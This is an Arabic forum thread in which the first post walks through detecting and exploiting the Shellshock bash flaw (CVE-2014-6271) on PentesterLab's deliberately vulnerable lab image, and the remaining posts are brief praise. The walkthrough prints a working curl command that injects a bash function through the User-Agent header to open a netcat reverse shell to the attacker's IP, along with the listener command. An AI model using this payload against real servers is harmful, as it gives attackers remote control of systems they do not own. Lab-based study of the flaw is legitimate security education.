1. Just for you

    Just for you DeveloPer Plus

    الأنتساب:
    ‏3 نوفمبر 2012
    المشاركات:
    116
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركآتهه ،

    اللهم صل وسلم وبآرك على سيدنا محمد وعلى اله وصحبه اجمعين ،

    اليوم قررت اعمل هل موضوع عشان انهي امر ثغرة : Shellshock

    كثير صار لها كلام ، ومواضيع واخذت حجم كبير جداً . وهذا السبب الرئيسي الذي ادى الى ترقيع الثغرة بالكثير من السيرفرات

    نبدء على بركة الله

    اولاً

    الثغرة عبارة عن ضعف امني في الباش سكربت ،،

    الثغرة هذه اخطر من ثغرة القلب النازف التي كانت في بروتوكل الـ SSL

    ولكن هنالك شرط اساسي لنتمكن من الاستغلال وهو

    ان يكون لديك خدمة او برنامج في السيرفر ينفذ اوامر الباش سكربت ، اي يستخدم الباش

    شفت كثير ناس تقول ملفات /cgi/ وشيء ذي كذا الامر خاطئ ماله علاقة الملف ،

    لكن البرنامج او الخدمة يكون يستخدم الباش

    طيب ترقيع الثغرة يكون من خلال تحديث الباش شيل

    نبدء على بركة الله في اكتشاف الثغرة

    بدايتاً قامت موقع Pentesterlab بتطوير توزيعة بسيطة جداً مصابة

    التوزيعة فيها اشياء بسطية جداً وحجمها بسط جداً جداً

    لتحميلها



    [PHP CODE]files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso[/PHP CODE]


    بعد التحميل نصبها في الفيموير مثلاً وادخلها

    نفذ امر sudo -s ، وبعدها فوراً نفذ ifconfig وخذ الاي بي واستعرضه

    تمام انا عملت كل هذا ويوم استعرضت كان الناتج

    [​IMG]

    تمام اشتغلت وكل شيء بحمد الله تمام ،،

    نشرح هل واجهة على السريع : CVE-2014-6271

    هو عنوان ارشفة الثغرة كل ثغرة تصل لنا يتم تصنيفها من خلال السنة التي اكتشفت بها

    و رقم الثغرة

    اي ان الثغرة هذه مكتشفة عام 2014 وهي رقم 6271 ،، رآئعع ..

    الان حتى نعرف انو في اصابة نجي نستعرض مصدر الصفحة عشان نعرف شو يلي عم يصير

    عندما استعرضت انا في البداية ظهر لي الكود التالي

    [​IMG]

    وهذا الكود هو كود جافا سكربت طيب ينفذ في ملف مساره

    /cgi-bin/status ، حلو كثير شفتو الملف هو مساره كذاcgi-bin لكن ليس هو المصاب بل المصاب

    هو الباش



    جميل جداً ، الان نفتح الملف هذا يلي هو بمسار cgi-bin/status

    [​IMG]

    حلوو جداً الان في اصابة وتم اكتشافها بهذه الطريقة

    طيب الان نذهب لـ الاستغلال
    {1!$2}

    اول شيء نعمل ريكوست من خلال مكتبة الكيرل باستخدم الخيار -k

    للملف ،

    الامر :



    [SQL]curl -k 192.168.136.129/cgi-bin/status[/SQL]


    والناتج كان

    [​IMG]

    طيب حلو كثير الان نكتب امر الاستغلال

    نخلي الركويست تمام ولح ناخذ الـ User-Agent تمام وبعدها لح نفذ امر من خلالها

    الامر هذا لح نعمل من خلاله اتصال بالنت كات على الاي بي الخاص بنا طيب نطبق على بركة

    الله تعآلى .

    نحط الامر

    [​IMG]

    تمام الامر :



    [SQL]curl -k http://192.168.136.129/cgi-bin/status -H 'User-Agent: () { :;}; /bin/bash -c "nc 192.168.1.5 8080 -e /bin/sh"'[/SQL]


    حلو كتير حددنا الاي بي الخاص بي + البورت المطلوب :{3!}:

    وهو 8080


    طيب لا تحطو انتر ابداً بس جهزو الامر ومن ترمنال جديد


    شغلو النت كات على التنصت على البورت 8080


    من خلال الامر :{y.}


    [SQL]nc -nlvp 8080[/SQL]


    طيب بعدها نرجع للترمنال القديم يلي فيه الامر ونفذ الامر ونرجع لترمنال النت كات


    ولح يكون الناتج هو



    [JS]Connection from [192.168.1.5] port 8080 [tcp/*] accepted (family 2, sport 35402)[/JS]


    مبروك الاتصال


    حلو كثير الان فيك تتحكم برآحتك بالسيرفر


    وبهيك خلصنا من Shellshock ،، وخلصنا من كل شيء فيها


    وسكرنا على الثغرة بالنسبة ﻷدوات الفحص انا افضل اليدوي ولكن في ادوات ابحثوا عنها [​IMG]

     
    1 person likes this.
  2. MR.CAPTCHA

    MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    38
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    رد: توضيح Shellshock الاكتشاف + الاستغلال

    أحسنت الطرح
    ثغرة مهمة و خطيرة
    ان شاء الله تفيد الاخوان [​IMG]
    تحياتي لك اخي العزيز
     
  3. فكها ان استطعتـ

    فكها ان استطعتـ موقوف لمخالفة الشروط

    الأنتساب:
    ‏24 أغسطس 2014
    المشاركات:
    52
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: توضيح Shellshock الاكتشاف + الاستغلال

    أحسنت {1!$8}
     
  4. الحاق1

    الحاق1 Developer

    الأنتساب:
    ‏17 سبتمبر 2014
    المشاركات:
    53
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: توضيح Shellshock الاكتشاف + الاستغلال

    أحسنت الطرح

    ان شاء الله تفيد الاخوان
     
  5. No-Security

    No-Security <span style="font-weight: bold; text-shadow: #BBBB DeveloPer Plus

    الأنتساب:
    ‏16 أكتوبر 2014
    المشاركات:
    177
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    18
    رد: توضيح Shellshock الاكتشاف + الاستغلال

    روووووعة
     
  6. كاسر قلوب الهكر

    كاسر قلوب الهكر Developer

    الأنتساب:
    ‏20 أكتوبر 2014
    المشاركات:
    100
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    رد: توضيح Shellshock الاكتشاف + الاستغلال

    تسلم ايدك :{1}:
     

مشاركة هذه الصفحة